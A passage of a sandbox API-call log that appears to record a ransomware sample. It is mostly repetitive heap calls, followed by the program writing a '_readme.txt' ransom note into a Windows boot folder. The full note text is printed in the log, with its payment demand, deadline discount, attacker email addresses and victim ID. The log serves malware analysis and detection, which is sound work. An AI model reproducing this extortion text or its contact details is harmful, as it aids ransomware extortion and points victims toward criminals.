hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.630] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0227.630] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.630] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.630] PathFindFileNameW (pszPath="") returned="" [0227.630] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.631] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.631] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.631] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.631] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0227.631] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0227.632] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 